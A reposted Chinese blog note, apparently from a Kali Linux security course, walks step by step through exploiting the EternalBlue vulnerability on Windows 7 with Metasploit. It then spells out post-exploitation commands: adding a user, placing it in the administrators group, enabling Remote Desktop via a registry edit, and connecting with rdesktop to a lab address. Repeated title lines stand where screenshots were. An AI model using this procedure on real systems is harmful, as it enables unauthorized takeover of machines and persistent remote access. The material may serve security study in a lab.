kali系统——网络安全v6笔记总结(四)

利用永恒之蓝漏洞实现w7远程操控
首先目标要关闭防火墙
kali系统——网络安全v6笔记总结(四)
kali系统——网络安全v6笔记总结(四)
kali系统——网络安全v6笔记总结(四)
然后打开Metasploit
kali系统——网络安全v6笔记总结(四)
输入永恒之蓝漏洞编码
kali系统——网络安全v6笔记总结(四)
复制运行第二条辅助项目
kali系统——网络安全v6笔记总结(四)
设置漏洞选项
kali系统——网络安全v6笔记总结(四)
运行项目,结果为有一个可能是漏洞的w7漏洞
kali系统——网络安全v6笔记总结(四)
然后选择第三个项目,即***项目,并设置漏洞选项
kali系统——网络安全v6笔记总结(四)
kali系统——网络安全v6笔记总结(四)
输入漏洞***命令 exploit
kali系统——网络安全v6笔记总结(四)
于是我们便进入了对方的w7命令终端,身份为最高权限者system(系统)
kali系统——网络安全v6笔记总结(四)
下一步我们输入命令net user 用户名 密码 /add来创建一个用户
然后用一个 net localgroup administrators 用户名 /add 命令来将刚才的用户拉入讨论组
然后输入命令 net localgroup administrators 查看管理员

输入命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 来开启远程桌面端口3389

/v 所选项之下要添加的值名。
/t RegKey 数据类型
/d 要分配给添加的注册表 ValueName 的数据。
/f 不用提示就强行覆盖现有注册表项。
现在我们就可以利用其他漏洞进行以远程桌面控制为渠道的******了

sessions -l 列出会话
sessions -i <id>选择会话
sessions -k <id> 结束会话
<ctrl> z 把会话放在后台
<ctrl> c 结束会话

kali终端窗口
rdesktop 192.168.4.239:3389 远程连接命令

猜你喜欢

转载自blog.51cto.com/14216854/2381436